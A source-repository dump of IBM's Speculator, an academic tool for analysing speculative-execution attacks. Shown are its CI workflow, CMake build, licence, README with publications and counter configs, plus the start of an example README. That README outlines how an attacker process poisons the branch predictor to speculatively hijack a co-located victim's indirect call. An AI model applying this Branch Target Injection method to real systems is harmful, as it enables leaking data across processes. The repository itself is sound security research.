├── .github └── workflows │ └── speculator-ci.yml ├── .gitignore ├── CMakeLists.txt ├── LICENSE ├── README.md ├── confs ├── speculator.json.amd.template └── speculator.json.intel.template ├── examples ├── BTI │ ├── README.md │ ├── bti_attacker.asm │ └── bti_victim.asm ├── SPEAR │ ├── architectural │ │ ├── backward_edge │ │ │ └── arch_bwd.asm │ │ └── forward_edge │ │ │ └── arch_fwd.asm │ ├── link_spear.zsh │ ├── run_spear.zsh │ └── speculative │ │ ├── backward_edge │ │ └── spec_bwd.asm │ │ └── forward_edge │ │ └── spec_fwd.asm ├── clflush_in_speculation │ ├── clflush_in_speculation_cached.asm │ └── clflush_in_speculation_uncached.asm ├── corr_issued_and_exec │ ├── corr_issued_and_exec.json │ └── corr_issued_and_exec_slow_lea.asm ├── doubleBTI │ ├── README.md │ ├── dblbti_attacker.asm │ ├── dblbti_attacker.c │ ├── dblbti_victim.asm │ ├── dblbti_victim.c │ └── doubleBTI_POC.zsh ├── mpx │ ├── mpx.asm │ └── spec_length.json ├── nx │ ├── nx.asm │ └── spec_length.json ├── rsb │ ├── rsb_fill_deep_stack.asm │ └── rsb_fill_deep_stack.json ├── speculation_in_speculation │ └── speculation_in_speculation_in_speculation.asm ├── speculation_stopper │ ├── speculation_stopper.asm │ └── speculation_stopper.json ├── syscall_speculation │ ├── syscall_speculation.asm │ ├── syscall_speculation.json │ └── syscall_speculation_baseline.asm ├── v1_various_cond_cycles │ ├── v1_cond_cached.asm │ ├── v1_cond_complex_cached_div.asm │ ├── v1_cond_complex_cached_mul.asm │ ├── v1_cond_complex_register_div.asm │ ├── v1_cond_complex_register_mul.asm │ ├── v1_cond_complex_uncached_div.asm │ ├── v1_cond_complex_uncached_mul.asm │ ├── v1_cond_register.asm │ ├── v1_cond_uncached.asm │ ├── v1_nocond_cached.asm │ ├── v1_nocond_complex_cached_div.asm │ ├── v1_nocond_complex_cached_mul.asm │ ├── v1_nocond_complex_register_div.asm │ ├── v1_nocond_complex_register_mul.asm │ ├── v1_nocond_complex_uncached_div.asm │ ├── v1_nocond_complex_uncached_mul.asm │ ├── v1_nocond_register.asm │ └── v1_nocond_uncached.asm 
├── v2_various_uncond_cycles │ ├── v2_uncond_cached.asm │ ├── v2_uncond_register.asm │ └── v2_uncond_uncached.asm └── v4_cycles │ ├── v4_cycles.asm │ └── v4_cycles.json ├── include ├── amd.h ├── config.h.in ├── intel.h └── speculator.h ├── scripts ├── cr_inc_snip.py ├── post-processing-exec.py ├── post-processing.py └── run_test.py ├── speculator.env ├── src ├── CMakeLists.txt └── speculator_monitor.c ├── templates └── x86 │ ├── example.json │ ├── template.asm │ └── template_branch.asm └── tests ├── CMakeLists.txt ├── include └── x86 │ ├── amd.inc │ ├── common.inc.in │ ├── intel.inc │ └── signals.inc └── musl ├── libc.a ├── libc.so ├── libcrypt.a ├── libdl.a ├── libm.a ├── libpthread.a ├── libresolv.a ├── librt.a ├── libutil.a ├── libxnet.a └── musl-gcc.specs /.github/workflows/speculator-ci.yml: -------------------------------------------------------------------------------- 1 | name: Speculator CI 2 | 3 | on: [push] 4 | 5 | jobs: 6 | build: 7 | name: compile-speculator 8 | runs-on: ${{ matrix.os }} 9 | strategy: 10 | matrix: 11 | os: [ubuntu-16.04, ubuntu-18.04, ubuntu-latest] 12 | compiler: [gcc, clang] 13 | steps: 14 | - uses: actions/checkout@v2 15 | 16 | - name: dependencies 17 | run: sudo apt install cmake gcc g++ clang libjson-c-dev libpfm4-dev ninja-build python-sqlalchemy cmake nasm python-numpy zsh 18 | 19 | - name: configure 20 | run: cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" 21 | env: 22 | SPEC_H: ./ 23 | SPEC_B: ./build 24 | SPEC_I: ./install 25 | 26 | - name: compile 27 | run: ninja -C $SPEC_B 28 | env: 29 | SPEC_B: ./build 30 | 31 | - name: install 32 | run: ninja -C $SPEC_B install 33 | env: 34 | SPEC_B: ./build 35 | 36 | - name: load_msr 37 | run: sudo modprobe msr 38 | 39 | - name: Return Stack Buffer example 40 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/rsb_deep_stack $SPEC_H/examples/rsb/rsb_fill_deep_stack.json $SPEC_H/examples/rsb/rsb_fill_deep_stack.asm && cmake $SPEC_H 
-B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/rsb_deep_stack && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 41 | env: 42 | SPEC_H: ./ 43 | SPEC_B: ./build 44 | SPEC_I: ./install 45 | 46 | - name: Speculation of Nested Branches example 47 | run: cp $SPEC_H/examples/speculation_in_speculation/speculation_in_speculation_in_speculation.asm $SPEC_H/tests && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/speculation_in_speculation_in_speculation.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 48 | env: 49 | SPEC_H: ./ 50 | SPEC_B: ./build 51 | SPEC_I: ./install 52 | 53 | - name: Speculative Execution Across System Calls example 54 | run: cp $SPEC_H/examples/syscall_speculation/syscall_speculation_baseline.asm $SPEC_H/tests && $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/syscall_speculation $SPEC_H/examples/syscall_speculation/syscall_speculation.json $SPEC_H/examples/syscall_speculation/syscall_speculation.asm && cp $SPEC_H/examples/speculation_in_speculation/speculation_in_speculation_in_speculation.asm $SPEC_H/tests && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/syscall_speculation && rm -rf $SPEC_H/tests/syscall_speculation_baseline.asm && rm -rf $SPEC_H/tests/*.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 55 | env: 56 | SPEC_H: ./ 57 | SPEC_B: ./build 58 | SPEC_I: ./install 59 | 60 | - name: Flushing the Cache example 61 | run: cp $SPEC_H/examples/clflush_in_speculation/clflush_in_speculation_cached.asm $SPEC_H/tests/ && cp $SPEC_H/examples/clflush_in_speculation/clflush_in_speculation_uncached.asm $SPEC_H/tests/ && cmake $SPEC_H -B$SPEC_B 
-DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/clflush_in_speculation_cached.asm $SPEC_H/tests/clflush_in_speculation/clflush_in_speculation_uncached.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 62 | env: 63 | SPEC_H: ./ 64 | SPEC_B: ./build 65 | SPEC_I: ./install 66 | 67 | - name: Speculation Window Size example 68 | run: cp $SPEC_H/examples/v1_various_cond_cycles/*.asm $SPEC_H/tests/ && cp $SPEC_H/examples/v2_various_uncond_cycles/*.asm $SPEC_H/tests/ && $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/v4_cycles $SPEC_H/examples/v4_cycles/v4_cycles.json $SPEC_H/examples/v4_cycles/v4_cycles.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/*.asm $SPEC_H/tests/v4_cycles && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 69 | env: 70 | SPEC_H: ./ 71 | SPEC_B: ./build 72 | SPEC_I: ./install 73 | 74 | - name: Speculation Stopper example 75 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/speculation_stopper $SPEC_H/examples/speculation_stopper/speculation_stopper.json $SPEC_H/examples/speculation_stopper/speculation_stopper.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/speculation_stopper && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 76 | env: 77 | SPEC_H: ./ 78 | SPEC_B: ./build 79 | SPEC_I: ./install 80 | 81 | - name: Execution Only Page example 82 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/nx $SPEC_H/examples/nx/spec_length.json $SPEC_H/examples/nx/nx.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 
-c && rm -rf $SPEC_H/tests/nx && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 83 | env: 84 | SPEC_H: ./ 85 | SPEC_B: ./build 86 | SPEC_I: ./install 87 | 88 | - name: Memory Protection Extension example 89 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/mpx $SPEC_H/examples/mpx/spec_length.json $SPEC_H/examples/mpx/mpx.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && rm -rf $SPEC_H/tests/mpx && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 90 | env: 91 | SPEC_H: ./ 92 | SPEC_B: ./build 93 | SPEC_I: ./install 94 | 95 | - name: Issued vs Executed uops example 96 | run: $SPEC_H/scripts/cr_inc_snip.py --output $SPEC_H/tests/corr_slow_lea $SPEC_H/examples/corr_issued_and_exec/corr_issued_and_exec.json $SPEC_H/examples/corr_issued_and_exec/corr_issued_and_exec_slow_lea.asm && cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" && ninja -C $SPEC_B install && sudo $SPEC_H/scripts/run_test.py $SPEC_I -r 1 -c && rm -rf $SPEC_H/tests/corr_slow_lea && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 97 | env: 98 | SPEC_H: ./ 99 | SPEC_B: ./build 100 | SPEC_I: ./install 101 | - name: SPEAR tests 102 | run: cp $SPEC_H/examples/SPEAR/*/*/*.asm $SPEC_H/tests && zsh $SPEC_H/examples/SPEAR/run_spear.zsh && rm -rf $SPEC_H/tests/*.asm && rm -rf $SPEC_I/* && rm -rf $SPEC_B/* 103 | env: 104 | SPEC_H: ./ 105 | SPEC_B: ./build 106 | SPEC_I: ./install 107 | 108 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | perf.data 2 | perf.data.old 3 | perf_test 4 | perf_test_asm 5 | lib/libhelper.a 6 | *.o 7 | speculator.json 8 | speculator.env 9 | tests/*.asm 10 | tests/*.c 11 | tests/*.inc 12 | tests/*.in 13 | -------------------------------------------------------------------------------- /CMakeLists.txt: 
-------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | cmake_minimum_required (VERSION 3.1) 16 | project (SPECULATOR VERSION 1.2.0 LANGUAGES C ASM) 17 | 18 | cmake_policy(SET CMP0048 NEW) 19 | 20 | include_directories(${CMAKE_CURRENT_SOURCE_DIR}/include) 21 | 22 | message(STATUS "Quering CPU type") 23 | execute_process (COMMAND cat /proc/cpuinfo 24 | COMMAND grep vendor_id 25 | COMMAND head -n 1 26 | COMMAND cut -d " " -f 2 27 | OUTPUT_VARIABLE VENDOR 28 | OUTPUT_STRIP_TRAILING_WHITESPACE) 29 | message(STATUS "CPU Detected -- ${VENDOR}") 30 | 31 | IF (NOT EXISTS speculator.json) 32 | IF(${VENDOR} STREQUAL "AuthenticAMD") 33 | configure_file(${CMAKE_CURRENT_SOURCE_DIR}/confs/speculator.json.amd.template ${CMAKE_CURRENT_SOURCE_DIR}/speculator.json @ONLY) 34 | message (STATUS "Generated default AMD counters config file") 35 | ELSEIF(${VENDOR} STREQUAL "GenuineIntel") 36 | configure_file(${CMAKE_CURRENT_SOURCE_DIR}/confs/speculator.json.intel.template ${CMAKE_CURRENT_SOURCE_DIR}/speculator.json @ONLY) 37 | message (STATUS "Generated default Intel counters config file") 38 | ELSE() 39 | message(FATAL_ERROR "CPU not yet supported: ${VENDOR}") 40 | ENDIF() 41 | ENDIF() 42 | 43 | configure_file(speculator.json speculator.json @ONLY) 44 | 45 | IF (${VENDOR} STREQUAL "AuthenticAMD") 46 | message(STATUS "Generating 
templates header for " ${VENDOR}) 47 | execute_process( 48 | COMMAND ${CMAKE_COMMAND} -E create_symlink 49 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/common.inc.in 50 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/common.inc.in 51 | ) 52 | execute_process( 53 | COMMAND ${CMAKE_COMMAND} -E create_symlink 54 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/amd.inc 55 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/pmc.inc 56 | ) 57 | execute_process( 58 | COMMAND ${CMAKE_COMMAND} -E create_symlink 59 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/signals.inc 60 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/signals.inc 61 | ) 62 | 63 | ELSEIF (${VENDOR} STREQUAL "GenuineIntel") 64 | message(STATUS "Generating templates header for " ${VENDOR}) 65 | execute_process( 66 | COMMAND ${CMAKE_COMMAND} -E create_symlink 67 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/common.inc.in 68 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/common.inc.in 69 | ) 70 | execute_process( 71 | COMMAND ${CMAKE_COMMAND} -E create_symlink 72 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/intel.inc 73 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/pmc.inc 74 | ) 75 | execute_process( 76 | COMMAND ${CMAKE_COMMAND} -E create_symlink 77 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/include/x86/signals.inc 78 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/signals.inc 79 | ) 80 | 81 | ENDIF() 82 | 83 | # Adding CMake Clean target 84 | if(${CMAKE_GENERATOR} STREQUAL "Ninja") 85 | add_custom_target(Clean COMMAND ninja clean) 86 | else() 87 | add_custom_target(Clean COMMAND ${MAKE} clean) 88 | endif() 89 | 90 | add_custom_command(TARGET Clean COMMAND rm -f 91 | ${CMAKE_CURRENT_SOURCE_DIR}/tests/*.in ${CMAKE_CURRENT_SOURCE_DIR}/tests/*.inc ) 92 | 93 | 94 | add_subdirectory(tests) 95 | add_subdirectory(src) 96 | 97 | install(FILES speculator.json 98 | DESTINATION . ) 99 | 100 | install(DIRECTORY "scripts" 101 | DESTINATION . 
102 | USE_SOURCE_PERMISSIONS) 103 | 104 | install(DIRECTORY 105 | DESTINATION "results") 106 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 
35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. 
You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 
123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. 
In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. 
We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![](https://github.com/ibm-research/speculator/workflows/Speculator%20CI/badge.svg)](https://github.com/ibm-research/speculator/actions) 2 | # Speculator 3 | 4 | Tool to Analyze Speculative Execution Attacks and Mitigations 5 | 6 | ## QuickStart 7 | A quickstart guide can be found [here](https://github.com/ibm-research/speculator/wiki/Quick_Start). 8 | In the guide, you can find information and commands on how to build and use speculator. 9 | 10 | For more examples please refer to [here](https://github.com/ibm-research/speculator/wiki/Examples) 11 | 12 | For more information please refer to the [wiki](https://github.com/ibm-research/speculator/wiki). 
13 | 14 | ## Branches 15 | `develop`: contains the latest version of Speculator (which might not be fully functional) 16 | 17 | `master`: the stable branch where the releases will be published 18 | 19 | `others`: the other branches represent currently developed features 20 | 21 | ## Publications 22 | * [1] A. Mambretti, A. Sandulescu, M. Neugschwandtner, A. Sorniotti, A. Kurmus 23 | Two Methods for Exploiting Speculative Control Flow Hijacks. 24 | 13th USENIX Workshop on Offensive Technologies (WOOT), Santa Clara, CA, USA, August 2019 25 | 26 | * [2] A. Mambretti, M. Neugschwandtner, A. Sorniotti, E. Kirda, W. Robertson, A. Kurmus 27 | Speculator: A Tool to Analyze Speculative Execution Attacks and Mitigations 28 | 35th Annual Computer Security Applications Conference (ACSAC), San Juan, Puerto Rico, December 2019 29 | 30 | * [3] A. Mambretti, P. Convertini, A. Sorniotti, A. Sandulescu, E. Kirda, A. Kurmus 31 | GhostBuster: understanding and overcoming the pitfalls of transient execution vulnerability checkers 32 | 28th IEEE International Conference on Software Analysis, Evolution and Reengineering (SANER), Honolulu, Hawaii, March 2021 33 | 34 | * [4] A. Mambretti, A. Sandulescu, A. Sorniotti, W. Robertson, E. Kirda, A. Kurmus 35 | Bypassing memory safety mechanisms through speculative control flow hijacking 36 | 6th IEEE European Symposium on Security and Privacy (EuroSP), Vienna, Austria, September 2021 37 | 38 | ### Git flow 39 | This repository follows the [git-flow][git-flow] branching model. Make sure to read and 40 | follow that model. The [AVH git extension][git-flow-avh] makes things much easier to handle, 41 | so everyone is invited to check it out. 
42 | 43 | 44 | [git-flow]: http://nvie.com/posts/a-successful-git-branching-model/ 45 | [git-flow-avh]: https://github.com/petervanderdoes/gitflow/ 46 | -------------------------------------------------------------------------------- /confs/speculator.json.amd.template: -------------------------------------------------------------------------------- 1 | { 2 | "victim": { 3 | "0": { 4 | "name" : "DIV_OP_COUNT", 5 | "description" : "NONE", 6 | "mask" : "" 7 | }, 8 | 9 | "1": { 10 | "name" : "RETIRED_UOPS", 11 | "description" : "NONE", 12 | "mask" : "" 13 | }, 14 | 15 | "2": { 16 | "name" : "PERF_COUNT_SW_CONTEXT_SWITCHES", 17 | "description" : "NONE", 18 | "mask" : "" 19 | }, 20 | 21 | "3": { 22 | "name" : "RETIRED_BRANCH_INSTRUCTIONS_MISPREDICTED", 23 | "description" : "NONE", 24 | "mask" : "" 25 | } 26 | }, 27 | 28 | "attacker": { 29 | "0": { 30 | "name" : "DIV_OP_COUNT", 31 | "description" : "NONE", 32 | "mask" : "" 33 | }, 34 | 35 | "1": { 36 | "name" : "RETIRED_UOPS", 37 | "description" : "NONE", 38 | "mask" : "" 39 | }, 40 | 41 | "2": { 42 | "name" : "PERF_COUNT_SW_CONTEXT_SWITCHES", 43 | "description" : "NONE", 44 | "mask" : "" 45 | }, 46 | 47 | "3": { 48 | "name" : "RETIRED_BRANCH_INSTRUCTIONS_MISPREDICTED", 49 | "description" : "NONE", 50 | "mask" : "" 51 | } 52 | } 53 | } 54 | 55 | -------------------------------------------------------------------------------- /confs/speculator.json.intel.template: -------------------------------------------------------------------------------- 1 | { 2 | "victim": { 3 | "0": { 4 | "name" : "LD_BLOCKS", 5 | "description" : "NONE", 6 | "mask" : "STORE_FORWARD" 7 | }, 8 | 9 | "1": { 10 | "name" : "UOPS_EXECUTED", 11 | "description" : "NONE", 12 | "mask" : "CORE" 13 | }, 14 | 15 | "2": { 16 | "name" : "BR_MISP_RETIRED", 17 | "description" : "NONE", 18 | "mask" : "ALL_BRANCHES" 19 | }, 20 | 21 | "3": { 22 | "name" : "UOPS_ISSUED", 23 | "description" : "NONE", 24 | "mask" : "SINGLE_MUL" 25 | } 26 | }, 27 | 28 | "attacker": { 29 
| "0": { 30 | "name" : "LD_BLOCKS", 31 | "description" : "NONE", 32 | "mask" : "STORE_FORWARD" 33 | }, 34 | 35 | "1": { 36 | "name" : "BR_MISP_RETIRED", 37 | "description" : "NONE", 38 | "mask" : "NEAR_TAKEN" 39 | }, 40 | 41 | "2": { 42 | "name" : "BR_MISP_RETIRED", 43 | "description" : "NONE", 44 | "mask" : "ALL_BRANCHES" 45 | }, 46 | 47 | "3": { 48 | "name" : "BR_MISP_RETIRED", 49 | "description" : "NONE", 50 | "mask" : "CONDITIONAL" 51 | } 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /examples/BTI/README.md: -------------------------------------------------------------------------------- 1 | # BTI 2 | This test provides an example of how Branch Target Injection (BTI) can be performed 3 | using Speculator. 4 | 5 | `Victim` performs an indirect call to a "correct" location that simply returns and exits. It contains 6 | three other functions (verify, verify2, verify3) that contain speculative execution markers. 7 | 8 | `verify` contains **1** LD_BLOCKS.STORE_FORWARD 9 | `verify2` contains **3** LD_BLOCKS.STORE_FORWARD 10 | `verify3` contains **6** LD_BLOCKS.STORE_FORWARD 11 | 12 | These functions are never called in the victim context. In fact, if executed 13 | as a stand-alone program, the victim does not trigger any marker of type 14 | LD_BLOCKS.STORE_FORWARD. 15 | The attacker, instead, performs the exact same sequence of 16 | calls that are performed in the victim, but with a specific target, multiple 17 | times. This forces into the branch history buffer the target we want the 18 | victim to be hijacked to. 19 | If the attacker is run just before the victim on a co-located thread, the 20 | speculative execution 